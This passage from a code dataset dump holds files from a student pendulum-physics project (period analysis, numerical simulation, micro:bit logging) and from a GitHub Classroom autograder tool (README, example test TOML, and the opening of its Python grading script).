"avg_line_length": 30.017093658447266,
"blob_id": "d16dd6aabc418724ffeea843b3b39865a6d0168d",
"content_id": "33f0ffae37d13aba05e895300179c49c07f63f97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3628,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 117,
"path": "/Step 4/Period.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project 1\n# Step 4\n# Analysis of Results\n# Period.py\n#\n# Jessica Nordlund \n# Faith Seely\n# \n##################################\n\n# IMPORT STATEMENTS\n##################################\nimport numpy as np\nimport Graphs\nimport matplotlib.pyplot as plt\n\n\n# CUSTOM FUNCTION DEFINITIONS\n###################################\n\n# function: calcPeriod\n# purpose: finds the period of the pendulum\n# paramter: numpy array of accelerations and numpy array of times \n# return: float (calculated period)\ndef calcPeriod(angles, times):\n periods = np.empty(0, dtype=float)\n last_p = 0\n \n for i in range(1,len(angles)):\n if (angles[i-1] > 0 and angles[i] < 0):\n new_p = (times[i-1] + times[i])/2\n periods = np.append(periods, new_p - last_p)\n last_p = new_p\n \n avg_period = 0\n for elem in periods:\n avg_period = avg_period + elem\n \n return avg_period / len(periods)\n\n\n# function: calcAllPeriods\n# purpose: finds the period of the pendulums from the given files\n# paramter: file names\n# file1 = 21 inches\n# file2 = 17 inches\n# file3 = 13 inches\n# file4 = 9 inches\n# file5 = 4.75 inches \n# return: array of periods (floats)\ndef calcAllPeriods(file1, file2, file3, file4, file5):\n acc21 = Graphs.getAccX(file1)\n ang21 = Graphs.calcTheta(acc21,float(21))\n time21 = Graphs.getTime(file1)\n period21 = calcPeriod(ang21,time21)\n print('Calculated period of pendulum with length of 21 inches: ', period21)\n\n acc17 = Graphs.getAccX(file2)\n ang17 = Graphs.calcTheta(acc17,float(17))\n time17 = Graphs.getTime(file2)\n period17 = calcPeriod(ang17,time17)\n print('Calculated period of pendulum with length of 17 inches: ', period17)\n\n acc13 = Graphs.getAccX(file3)\n ang13 = Graphs.calcTheta(acc13,float(13))\n time13 = Graphs.getTime(file3)\n period13 = calcPeriod(ang13,time13)\n print('Calculated period of pendulum with length of 13 inches: ', period13)\n \n acc9 = Graphs.getAccX(file4)\n ang9 = Graphs.calcTheta(acc9,float(9))\n time9 = Graphs.getTime(file4)\n period9 = calcPeriod(ang9,time9)\n print('Calculated period of pendulum with length of 9 inches: ', period9)\n \n acc5 = Graphs.getAccX(file5)\n ang5 = Graphs.calcTheta(acc5,float(4.75))\n time5 = Graphs.getTime(file5)\n period5 = calcPeriod(ang5,time5)\n print('Calculated period of pendulum with length of 4.75 inches:', period5)\n \n return [period21, period17, period13, period9, period5]\n\n\n# function: graphPvL\n# purpose: graphs period vs length of pendulums\n# paramter: numpy array of periods and corresponding lengths\n# return: void\ndef graphPvL(periods, lengths):\n plt.plot(lengths, periods, \"b\")\n plt.ylabel(\"Period (s)\")\n plt.xlabel(\"Length (inches)\")\n plt.title(\"Pendulum Period vs Length\")\n plt.show()\n \n# function: graphLog\n# purpose: takes an array of lengths and an array of periods of a pendulum \n# and graphs the logs of these arrays\n# paramter: numpy array of lengths of pendulum and numpy of periods\n# return: void\ndef graphLog(lens, periods):\n plt.plot(lens, periods, \"-bo\")\n plt.xlabel(\"Length (inches)\")\n plt.ylabel(\"Period (s)\")\n plt.title(\"Pendulum Period vs Length (log scale)\")\n plt.yscale('log')\n plt.xscale('log')\n plt.show()\n\n \n# MAIN SCRIPT\n###################################\nperiods = calcAllPeriods('Data21.csv', 'Data17.csv', 'Data13.csv', \n 'Data9.csv' , 'Data475.csv')\nlengths = [21.0, 17.0, 13.0, 9.0, 4.75]\ngraphPvL(periods, lengths)\ngraphLog(lengths, periods)"
},
{
"alpha_fraction": 0.6465554237365723,
"alphanum_fraction": 0.6559692025184631,
"avg_line_length": 30.594594955444336,
"blob_id": "531b22f0a97c00d5829f47a312b573aa70f552d2",
"content_id": "8bc0adca18b6cf9e0fdd316e9410f8c831f3a673",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2337,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 74,
"path": "/Step 2/step1_theoretical_period.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project 1\n# Step 2\n# Theoretical Based Equation Model\n#\n# Jessica Nordlund \n# Faith Seely\n#\n#\n# While this model follows the theoretical equation T = 2pi(L/g)^1/2, this \n# equation does not account for friction or air resistance. It also assumes \n# all the mass of the pendulum is at the end of the string when in reality the\n# string also has mass and its own gravitational pull. This means that the \n# model can only be so accurate and does not fully represent the real pendulum \n# we built.\n# \n##################################\n\n# IMPORT STATEMENTS\n##################################\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# GLOBAL VARIABLES\n###################################\nGRAVITY = 386.09 #inches/ses/sec\n\n# CUSTOM FUNCTION DEFINITIONS\n###################################\n\n# function: estimatePeriod\n# purpose: takes an array of lengths of a pendulum and returns array of \n# estimated periods based on the equation T = 2pi(L/g)^1/2\n# paramter: numpy array of lengths of pendulum\n# return: array of estimated periods of the different pendulums (seconds)\ndef estimatedPeriod(lens):\n result = np.sqrt(lens / GRAVITY)\n result = result * math.pi * 2\n return result\n\n# function: graphValues\n# purpose: takes an array of lengths and an array of periods of a pendulum \n# and graphs the variables (periods vs lengths)\n# paramter: numpy array of lengths of pendulum and numpy of periods\n# return: void\ndef graphValues(lens, periods):\n plt.plot(lens, periods, \"-bo\")\n plt.xlabel(\"Length (inches)\")\n plt.ylabel(\"Period (s)\")\n plt.title(\"Pendulum Period vs Length\")\n plt.show()\n \n# function: graphLog\n# purpose: takes an array of lengths and an array of periods of a pendulum \n# and graphs the logs of these arrays\n# paramter: numpy array of lengths of pendulum and numpy of periods\n# return: void\ndef graphLog(lens, periods):\n plt.plot(lens, periods, \"-bo\")\n plt.xlabel(\"Length (inches)\")\n plt.ylabel(\"Period (s)\")\n plt.title(\"Pendulum Period vs Length (log scale)\")\n plt.yscale('log')\n plt.xscale('log')\n plt.show()\n\n# MAIN SCRIPT\n###################################\nlengths = np.array([5,9,13,17,21])\nperiods = estimatedPeriod(lengths)\ngraphValues(lengths,periods)\ngraphLog(lengths,periods)\nprint(\"Estimated periods (s): \")\nprint(periods)"
},
{
"alpha_fraction": 0.5251396894454956,
"alphanum_fraction": 0.5530726313591003,
"avg_line_length": 28.027027130126953,
"blob_id": "05c1748d5a0c67c644c61ea31225e9b0849ef961",
"content_id": "b3de527b11eb0fd59c6f71927f209a5f02272a8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1074,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 37,
"path": "/README.md",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project1\nProject 1 Starter Code\n\nNames: Faith Seely and Jessica Nordlund\nTeam Name: Faith and Jessica\n\nStep 2 \n included file(s): step1_theoretical_period.py\n file to run to get theoretical data: step1_theoretical_period.py\n \nStep 3\n included file(s): logger.py\n receiver.py\n \nStep 4\n included file(s): Step4.py (duplicate of Graphs.py)\n Graphs.py\n Period.py\n Data21.csv\n Data17.csv\n Data13.csv\n Data9.csv\n Data475.csv\n ( Pendulum21.csv\n Pendulum17.csv\n Pendulum13.csv\n Pendulum9.csv\n Pendulum475.csv )\n file to run to get acceleration and angular position data: Graphs.py\n file to run to get period data: Period.py\n \n *the pendulum.csv files and Step4.py were NOT used in the final version of this project\n \n \nStep 5\n included file(s): Simulation.py\n file to run to get simulated data: Simulation.py\n"
},
{
"alpha_fraction": 0.6093823909759521,
"alphanum_fraction": 0.6242299675941467,
"avg_line_length": 28.58878517150879,
"blob_id": "861aa8dda62334bc392c6cf1a64056767d01667e",
"content_id": "af88d8b090f6f9d54bbdec5a08e03ce6dd918c3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6331,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 214,
"path": "/Step 5/Simulation.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project 1\n# Step 5\n# Numerical Simulation Model\n# Model.py\n#\n# Jessica Nordlund \n# Faith Seely\n# \n##################################\n\n# IMPORT STATEMENTS\n##################################\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport time\n\n\n# GLOBAL VARIABLES\n##################################\nGRAVITY = -386.09 #inches/ses/sec\nINIT_VEL = 0\nINIT_POS = math.pi/4\nTIME = 2 #seconds\n\n# CUSTOM FUNCTION DEFINITIONS\n###################################\n\n# function: getInitAcc\n# purpose: finds initial accelertaion given the length of the pendulum\n# paramter: length of pendulum (float)\n# return: float (initial acceleration)\ndef getInitAcc(length):\n return (GRAVITY/length)*math.sin(INIT_POS)\n\n\n# function: newTime\n# purpose: adds a new time in seconds to the given array and returns new \n# paramter: numpy array of times\n# return: modified numpy array of times\ndef newTime(times):\n return np.append(times, time.time())\n\n# function: newVel\n# purpose: finds a new angular velocity given an old angular acceleration\n# paramter: 3 numpy arrays of velocities, accelerations, and times\n# return: numpy array of velocities with calculated velocity added\ndef newVel(accs, vels, times):\n # old w + acc*t \n time_elapsed = times[len(times)-1] - times[len(times)-2]\n new_vel = vels[len(vels)-1] + (accs[len(accs)-1] * time_elapsed)\n return np.append(vels,new_vel)\n \n \n \n# function: newPos\n# purpose: finds a new angular position given an old angular velocity\n# paramter: 3 numpy array of velocities, positions, and times and length of \n# pendulum\n# return: numpy array of positions with calculated position added\ndef newPos(vels, pos, times, length):\n # old pos + old vel*t + (1/2)(g/L sin (old theta) t^2), t = time step\n time_elapsed = times[len(times)-1] - times[len(times)-2]\n term1 = vels[len(vels)-1]\n term2 = (1/2)*(GRAVITY/length)*(math.sin(pos[len(pos)-1]))\n new_pos = pos[len(pos)-1] + term1*time_elapsed + term2*(time_elapsed**2)\n return np.append(pos,new_pos)\n \n\n# function: newAcc\n# purpose: finds a new angular acceleration given an old angular position\n# paramter: numpy array of positions and a numpy array of accelerations and \n# the length of the pendulum\n# return: numpy array of accelerations with calculated acceleration added\ndef newAcc(pos, accs, times, length):\n # G/L SIN THETA\n new_acc = (GRAVITY/length) * math.sin(pos[len(pos)-1])\n return np.append(accs,new_acc)\n\n# function: normalizeTimes\n# purpose: takes the times numpy array and scales it to start at 0 \n# paramter: numpy array of times\n# return: modified numpy array of times\ndef normalizeTimes(times):\n np_len = len(times)\n result = [0]\n temp = times[0]\n \n for i in range(1,np_len-1):\n new_t = (times[i] - temp) + result[i-1]\n temp = times[i]\n result = np.append(result,new_t)\n \n return result\n\n\n# function: graphValues\n# purpose: graphs angular accelertaion, velocity , and position over time\n# paramter: 4 numpy array of accelerations, velocities, positions, and times\n# return: void\ndef graphValues(accs, vels, pos, times):\n plt.subplot(211)\n plt.plot(times, accs, \"b\")\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Angular Accleration (radians/s^2)\")\n plt.title(\"Pendulum Acceleration vs Time\")\n plt.show()\n \n plt.subplot(212)\n plt.plot(times, vels, \"r\")\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Angular Velocity (radians/sec)\")\n plt.title(\"Pendulum Velocity vs Time\")\n plt.show()\n \n plt.plot(times, pos, \"g\")\n 
plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Angular Position (radians)\")\n plt.title(\"Pendulum Position vs Time\")\n plt.show()\n\n\n# function: calcPeriod\n# purpose: finds the period of the pendulum\n# paramter: numpy array of angles and numpy array of times \n# return: float (calculated period)\ndef calcPeriod(angles, times):\n p_times = []\n \n #just need one period (two data points since simulated)\n while (len(p_times) < 2):\n for i in range(1,len(angles)):\n #check conditional (anytime changes sign)\n if ((angles[i-1] > 0 and angles[i] < 0) or (angles[i-1] < 0 and angles[i] > 0)):\n p_times = np.append(p_times,times[i])\n break \n \n #multiply by 2 to get full period\n return abs(p_times[1] - p_times[0])*2\n \n \n\n\n\n# function: graphPvL\n# purpose: graphs period vs length of pendulums\n# paramter: numpy array of periods and corresponding lengths\n# return: void\ndef graphPvL(periods, lengths):\n plt.plot(lengths, periods, \"b\")\n plt.ylabel(\"Period (s)\")\n plt.xlabel(\"Length (inches)\")\n plt.title(\"Pendulum Period vs Length\")\n plt.show()\n \n\n# function: graphLog\n# purpose: takes an array of lengths and an array of periods of a pendulum \n# and graphs the logs of these arrays\n# paramter: numpy array of lengths of pendulum and numpy of periods\n# return: void\ndef graphLog(lens, periods):\n plt.plot(lens, periods, \"-bo\")\n plt.xlabel(\"Length (inches)\")\n plt.ylabel(\"Period (s)\")\n plt.title(\"Pendulum Period vs Length (log scale)\")\n plt.yscale('log')\n plt.xscale('log')\n plt.show()\n\n \n\n# MAIN SCRIPT\n###################################\nperiods = []\nlengths = np.array([21.0, 17.0, 13.0, 9.0, 4.75])\n\nfor length in lengths:\n times = [time.time()]\n ang_v = [INIT_VEL]\n ang_x = [INIT_POS]\n ang_a = [getInitAcc(length)]\n \n elapsed_time = 0\n \n while (elapsed_time < TIME):\n times = newTime(times)\n ang_v = newVel(ang_a,ang_v,times)\n ang_x = newPos(ang_v,ang_x,times,length)\n ang_a = newAcc(ang_x,ang_a,times,length)\n \n elapsed_time = time.time() - times[0]\n \n #scale time\n times = normalizeTimes(times)\n \n #make arrays the same shape\n times = times[:30000]\n ang_a = ang_a[:30000]\n ang_v = ang_v[:30000]\n ang_x = ang_x[:30000]\n \n print('****************************************')\n print()\n print('Data for pendulum of length ', length)\n \n graphValues(ang_a,ang_v,ang_x,times)\n period = calcPeriod(ang_x,times)\n \n print('Period: ', period, '(pendulum of length ', length,')')\n periods = np.append(periods,period)\n\ngraphPvL(periods,lengths)\ngraphLog(lengths, periods)"
},
{
"alpha_fraction": 0.5949848294258118,
"alphanum_fraction": 0.6063829660415649,
"avg_line_length": 25.34000015258789,
"blob_id": "d90484c222d14dd227c2f5df9387cf151381e68f",
"content_id": "3d30c20c5a5b0b68816c41b72b62aa82f533ea1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1316,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 50,
"path": "/Step 3/logger.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "##################\n# Project 1\n# Step 3\n# Logger.py\n#\n#\n# Jessica Nordlund\n# Faith Seely\n#################\n\nimport microbit as mb\nimport radio # Needs to be imported separately\n\n# Change the channel if other microbits are interfering. (Default=7)\nradio.on() # Turn on radio\nradio.config(channel=5, length=100)\n\nprint('Program Started')\nmb.display.show(mb.Image.HAPPY)\n\nwhile not mb.button_a.is_pressed(): # wait for button A to be pressed to begin logging\n mb.sleep(10)\n\nradio.send('start') # Send the word 'start' to start the receiver\nmb.sleep(1000)\nmb.display.show(mb.Image.HEART) # Display Heart while logging\n\n\n# Read and send accelerometer data repeatedly until button A is pressed again\nwhile not mb.button_a.is_pressed():\n ######################################################\n # FILL In HERE\n # Need to collect accelerometer and time measurements\n # Need to format into a single string\n # Send the string over the radio\n ######################################################\n x = mb.accelerometer.get_x()\n y = mb.accelerometer.get_y()\n z = mb.accelerometer.get_z()\n rel_time = mb.running_time()\n\n message = str(x) + \" \" + str(y) + \" \" + str(z) + \" \" + str(rel_time)\n\n\n radio.send(message)\n mb.sleep(10)\n\n\n\nmb.display.show(mb.Image.SQUARE) # Display Square when program ends"
},
{
"alpha_fraction": 0.6035313010215759,
"alphanum_fraction": 0.6160156726837158,
"avg_line_length": 28.983957290649414,
"blob_id": "02680b11ea498c1162d5c76d74e89930ef9dff80",
"content_id": "8a01e50003d01a9ed7b15756a33878072d5daa86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5607,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 187,
"path": "/Step 4/Step4.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project 1\n# Step 4\n# Analysis of Results\n#\n# Jessica Nordlund \n# Faith Seely\n# \n##################################\n\n# IMPORT STATEMENTS\n##################################\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport csv\nimport scipy.signal\n\n\n\n# CUSTOM FUNCTION DEFINITIONS\n###################################\n\n# function: getAccX\n# purpose: gets the x acceleration from the given file and returns it as an\n# array\n# paramter: filename (where data is located)\n# return: array of x accelerations (floats)\ndef getAccX(filename): \n acc_x = np.empty(0, dtype=float)\n raw_data = open(filename)\n data_csv = csv.reader(raw_data)\n \n for row in data_csv:\n if (len(row) != 0):\n acc_x = np.append(acc_x, row[0]) \n \n acc_x = acc_x.astype(np.float) #from array of strings to floats\n return scipy.signal.medfilt(acc_x)\n\n# function: getAccY\n# purpose: gets the y acceleration from the given file and returns it as an\n# array\n# paramter: filename (where data is located)\n# return: array of y accelerations (floats)\ndef getAccY(filename): \n acc_y = np.empty(0, dtype=float)\n raw_data = open(filename)\n data_csv = csv.reader(raw_data)\n \n for row in data_csv:\n if (len(row) != 0):\n acc_y = np.append(acc_y, row[1]) \n \n acc_y = acc_y.astype(np.float) #from array of strings to floats\n return scipy.signal.medfilt(acc_y)\n\n# function: getAccZ\n# purpose: gets the z acceleration from the given file and returns it as an\n# array\n# paramter: filename (where data is located)\n# return: array of z accelerations (floats)\ndef getAccZ(filename): \n acc_z = np.empty(0, dtype=float)\n raw_data = open(filename)\n data_csv = csv.reader(raw_data)\n \n for row in data_csv:\n if (len(row) != 0):\n acc_z = np.append(acc_z, row[2]) \n \n acc_z = acc_z.astype(np.float) #from array of strings to floats\n return scipy.signal.medfilt(acc_z)\n \n\n# function: getTime\n# purpose: gets the time stamps from the given file and returns them as an\n# array\n# paramter: filename (where data is located)\n# return: array of times (floats)\ndef getTime(filename): \n times = np.empty(0, dtype=float)\n raw_data = open(filename)\n data_csv = csv.reader(raw_data)\n \n for row in data_csv:\n if (len(row) != 0):\n times = np.append(times, row[3]) \n \n times = times.astype(np.float) #from array of strings to floats\n return times\n \n\n# function: graphAcc\n# purpose: takes 3 arrays of accelerations and an array of time of a pendulum \n# and graphs the variables (accelerations vs time)\n# paramter: numpy arrays of accelerations (milli-g) of pendulum and numpy of \n# time (seconds)\n# return: void\ndef graphAcc(acc_x, acc_y, acc_z,time): \n plt.subplot(311)\n plt.plot(time, acc_x, \"b\")\n plt.xlabel(\"Time (s)\")\n plt.title(\"Pendulum Acceleration vs Time\")\n plt.legend('X')\n \n plt.subplot(312)\n plt.plot(time, acc_y, \"r\")\n plt.ylabel(\"Acceleration (milli-g)\")\n plt.xlabel(\"Time (s)\")\n plt.legend('Y')\n \n plt.subplot(313)\n plt.plot(time, acc_z, \"g\")\n plt.xlabel(\"Time (s)\")\n plt.legend('Z')\n\n plt.show()\n \n \n# function: calcTheta\n# purpose: finds the theta values from a given set of accelerations\n# paramter: numpy array of accelerations, length of pendulum\n# return: numpy array of angular positions\ndef calcTheta(accelerations, length):\n accs = accelerations.astype(np.float)\n thetas = np.arctan(np.divide(accs,length))\n \n return scipy.signal.medfilt(thetas)\n \n \n# function: graphTheta\n# purpose: takes an array of angular positions and an array of 
times \n# and graphs the variables (angular position vs time)\n# paramter: numpy array of thetas (radians) of accelerations and numpy of \n# time (seconds)\n# return: void\ndef graphTheta(theta, time):\n plt.plot(time, theta, \"b\")\n plt.ylabel(\"Angular Position (degrees)\")\n plt.xlabel(\"Time (s)\")\n plt.title(\"Pendulum Acceleration vs Time\")\n plt.show()\n \n\n\n# function: displayData\n# purpose: displays accelerations vs time graphs and angle vs time graphs \n# from the data given, also prints calculated period\n# paramter: filename of where data for pendulum is stored (.csv) and string\n# of length of pendulum (inches)\n# return: void\ndef displayData(file, length):\n print('GETTING DATA FOR PENDULUM WITH LENGTH OF ', length, ' INCHES')\n acc_x = getAccX(file)\n acc_y = getAccY(file)\n acc_z = getAccZ(file)\n time = getTime(file)\n graphAcc(acc_x,acc_y,acc_z,time)\n thetas = calcTheta(acc_x, float(length))\n graphTheta(thetas,time)\n print('\\n\\n\\n')\n \n \n# function: display\n# purpose: displays accelerations vs time graphs and angle vs time graphs \n# from the data for 5 different length pendulums, also prints \n# calculated period\n# paramter: filenames of where data for each pendulum is stored (.csv)\n# file1 = 21 inches\n# file2 = 17 inches\n# file3 = 13 inches\n# file4 = 9 inches\n# file5 = 4.75 inches \n# return: void\ndef display(file1, file2, file3, file4, file5):\n displayData(file1, '21')\n displayData(file2, '17')\n displayData(file3, '13')\n displayData(file4, '9')\n displayData(file5, '4.75')\n\n\n# MAIN SCRIPT\n###################################\n\ndisplay('Data21.csv', 'Data17.csv', 'Data13.csv', 'Data9.csv', \n 'Data475.csv')\n"
}
] | 7 |
maguiremarion/autograder
|
https://github.com/maguiremarion/autograder
|
8c763e5e29cd22f84ef8e4a5257ef7240a314b07
|
671347c4e4b8421504267ba3f1a66f1b8ea8bdd8
|
eaa6d12c0ebbf4a7671b30745996254fab29aba0
|
refs/heads/main
| 2023-07-13T06:41:24.768113 | 2021-08-21T17:29:56 | 2021-08-21T17:29:56 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3856041133403778,
"alphanum_fraction": 0.5012853741645813,
"avg_line_length": 15.913043022155762,
"blob_id": "ea085adbd860c14e333a9b5bb12ec143232af2a7",
"content_id": "c41d83e33af246f26437b49354a02ac0f4e968c6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 389,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 23,
"path": "/example_tests/project02/project02.toml",
"repo_name": "maguiremarion/autograder",
"src_encoding": "UTF-8",
"text": "[[tests]]\nname = \"01\"\ninput = [\"./$project\", \"-e\", \"1 + 1\"]\nexpected = \"2\"\nrubric = 5\n\n[[tests]]\nname = \"02\"\ninput = [\"./$project\", \"-e\", \"10\", \"-b\", \"16\"]\nexpected = \"0x0000000A\"\nrubric = 5\n\n[[tests]]\nname = \"03\"\ninput = [\"./$project\", \"-e\", \"10 + 1\"]\nexpected = \"11\"\nrubric = 5\n\n[[tests]]\nname = \"04\"\ninput = [\"./$project\", \"-e\", \"10 + 1\", \"-b\", \"16\"]\nexpected = \"0x0000000B\"\nrubric = 5\n"
},
{
"alpha_fraction": 0.665744960308075,
"alphanum_fraction": 0.6877033114433289,
"avg_line_length": 42.2957763671875,
"blob_id": "125073e8157ebf9fb023329e2f09a03b00edc183",
"content_id": "c75d144734920ddc9dd7bf05b9350232ef15371e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6148,
"license_type": "permissive",
"max_line_length": 204,
"num_lines": 142,
"path": "/README.md",
"repo_name": "maguiremarion/autograder",
"src_encoding": "UTF-8",
"text": "# autograder\n`grade` is a tool for Computer Science students and instructors to test student projects for correctness. Its features include:\n1. Clone all student repos based on a list of Github IDs\n1. Build all student repos using `make`\n1. Run all student repos against instructor-provided input files\n1. Score actual output vs. expected using an instructor-provided rubric.\n1. Integration with the [Digital](https://github.com/hneemann/Digital) circuit simulation tool\n\n## Requirements\n1. Requires python3 and pip3. Python 3.7.3 is pre-installed on Raspberry Pi OS.\n ```\n $ sudo apt install python3-pip\n ```\n1. Requires [TOML](https://toml.io/en/) python module\n ```\n $ pip3 install toml\n ```\n\n## Installation\n1. Clone the `autograder` repo\n ```\n $ cd ~\n $ git clone [email protected]:/phpeterson-usf/autograder.git\n ```\n1. Add the directory to your path in `~/.bashrc`\n ```\n export PATH=~/autograder/:$PATH\n ```\n1. Clone your class's tests repo. Use the right one for your class - these are just examples.\n ```\n $ cd ~\n $ git clone [email protected]:/cs315-21s/tests.git\n $ git clone [email protected]:/USF-CS631-S21/tests.git\n ``` \n1. Run the `grade` script once and it will create a config file in `~/.config/grade`. Edit this so it contains the following pieces of information:\n 1. The authentication you use for GitHub: ssh or https\n 1. The Github Classroom organization for your class\n 1. The path to your tests repo\n ```\n credentials = \"ssh\"\n testspath = \"/home/pi/tests\"\n ```\n\n## Usage for Students\n1. You can test a project in the current directory like this\n ```\n $ cd ~/project02-phpeterson-usf\n $ grade test --project project02\n ```\n\n## Usage for Instructors\n1. Add your Github Classroom organization and a list of students to your `~/.config/grade/config.toml`\n ```\n org = \"cs315-21s\"\n students = [\n \"phpeterson-usf\",\n \"gdbenson\",\n ]\n ```\n1. You can clone all of your students repos to your machine. `grade` will create `./github.com/` in the current working directory, with subdirectories for your organization and student repos\n ```\n $ grade clone\n github.com/cs315-21s/project02-phpeterson-usf\n github.com/cs315-21s/project02-gdbenson\n ```\n1. After developing test cases for your projects (see below), you can test all of your students' repos in batch\n ```\n $ grade class\n project02-phpeterson-usf 01 02 10/10\n project02-gdbenson 01 02 10/10\n ```\n1. Each test case can pass or fail. The score is shown as the total earned/total available, based on the `rubric` field in each test case\n\n## Test Cases\n1. Instructors must create their own repo for the test cases for the class projects. Students will clone and pull this repo. We create this repo in the Github Classroom Organization, but that's up to you.\n1. Test cases for each project are expressed in TOML, as you can see in the `example_tests/` directory here\n1. Test case inputs are a list of strings for each command-line flag and value. The keyword `$project` will be substituted for\nthe name of your project. \n ```\n $ cat project02.toml\n [[tests]]\n name = \"01\"\n input = [\"./$project\", \"-e\", \"1 + 1\"]\n expected = \"2\"\n rubric = 5\n \n [[tests]]\n name = \"02\"\n input = [\"./$project\", \"-e\", \"10\", \"-b\", \"16\"]\n expected = \"0x0000000A\"\n rubric = 5\n ```\n1. Note that this usage of `$project` is flexible enough for projects which are run using an interpreter like Java or Python\n ```\n [[tests]]\n input = [\"python3\", \"$project.py\"]\n ```\n1. 
Test cases can have input files in your `tests` repo using the keyword `$project_tests`, which will be \nsubstituted for `$testspath/$project/`. In this example, substitution gives the input file as `$testspath/project02/testinput.txt`\n ```\n [[tests]]\n name = \"03\"\n input = [\"./$project\", \"$project_tests/testinput.txt\"]\n ```\n1. Test case output can be recorded from `stdout` or from a file. If `output` is not given, Autograder defaults to `stdout`\n ```\n [[tests]]\n name = \"04\"\n output = \"04.txt\"\n input = [\"./$project\", \"-o\", \"04.txt\"]\n ```\n\n## Command Line Parameters\n1. `grade` supports these parameters, which can be given on the command line, or in `~/.config/grade/config.toml`, for less typing. \n1. The syntax in `config.toml` just uses the name, without dashes, as shown at the top of this README\n1. The command-line format is argparse-style, with no \"=\". These two commands are equivalent:\n ```\n $ cd ~/project02-jsmith\n $ grade test -p project02\n $ grade test --project project02\n ```\n1. Parameters given on the command line override those given in `config.toml`\n* `-c/--credentials` [https | ssh] https is the default\n* `-d/--digital` is the path to Digital's JAR file\n* `-e/--exec` provide commands to execute (e.g. `git pull; make clean`)\n* `-i/--ioprint` prints inputs and outputs to help write project specs\n* `-n/--name` runs one named test case, rather than all of them\n* `-o/--org` is the Github Classroom Organization \n* `-p/--project` is the name of the project, which is substituted into repo names and test case inputs\n* `-s/--students` is a list of student Github IDs (no punctuation needed)\n* `-v/--verbose` shows expected and actual for failing test cases\n* `-vv/--vverbose` shows expected and actual for all test cases\n\n## Using Digital\n1. [Digital](https://github.com/hneemann/Digital) has test case components which can test a circuit using pre-defined inputs and outputs. See Digital's documentation for scripted testing examples.\n1. `grade` leverages its ability to loop over the student repos, using Java and Digital's test case components, looking\nfor a passing report from Digital\n1. Examples of Digital test cases combined with autograder test cases are available [here](https://github.com/phpeterson-usf/autograder/tree/main/tests/project06)\n1. `grade` needs to know where Digital's JAR file lives. There is a configuration for that path in `config.toml`, in your platform's native format\n ```\n digital = \"/home/me/Digital/digital.jar\"\n ```\n"
},
{
"alpha_fraction": 0.5354330539703369,
"alphanum_fraction": 0.5388181805610657,
"avg_line_length": 34.66666793823242,
"blob_id": "140073c581d20f1689ef80036f501a15fce58a4a",
"content_id": "ed7bbb85704a27f88e005e4b51369c82ffb45be9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13589,
"license_type": "permissive",
"max_line_length": 131,
"num_lines": 381,
"path": "/grade",
"repo_name": "maguiremarion/autograder",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport argparse\nimport difflib\nimport os\nimport pathlib\nimport string\nimport subprocess\nimport sys\nimport toml\n\n\ndef fatal(s):\n print(s)\n sys.exit(-1)\n\n\ndef cmd_exec(args, wd=None, shell=False):\n return subprocess.run(args, capture_output=True, timeout=10, cwd=wd, shell=shell)\n\n\ndef cmd_exec_rc(args, wd=None):\n proc = cmd_exec(args, wd)\n return proc.returncode\n\n\ndef cmd_exec_capture(args, wd=None, path=None, shell=False):\n proc = cmd_exec(args, wd, shell)\n if (path):\n try:\n # capture output written to path\n f = open(path, 'r')\n output = f.read()\n f.close()\n except FileNotFoundError:\n return ''\n else:\n # capture output written to stdout\n output = proc.stdout.decode('utf-8')\n return output.rstrip('\\n')\n\n\ndef print_green(s, e=''):\n print('\\033[92m' + s + '+' + ' \\033[0m', end=e)\n\n\ndef print_red(s, e=''):\n print('\\033[91m' + s + '-' + ' \\033[0m', end=e)\n\n\ndef load_toml(fname):\n with open(fname) as f:\n try:\n return toml.load(f)\n except Exception as e:\n fatal(f'{fname}: {e}')\n\n\nclass ProjectConfig:\n def __init__(self, d):\n self.build = d.get('build', 'make')\n self.strip_output = d.get('strip_output')\n\nclass Config:\n def __init__(self, d):\n self.action = d['action'] # required\n self.credentials = d['credentials'] # required\n self.digital = d.get('digital') # optional til Digital projects\n self.exec_cmd = d.get('exec') # optional\n self.local = d.get('local') # could get students or local\n self.org = 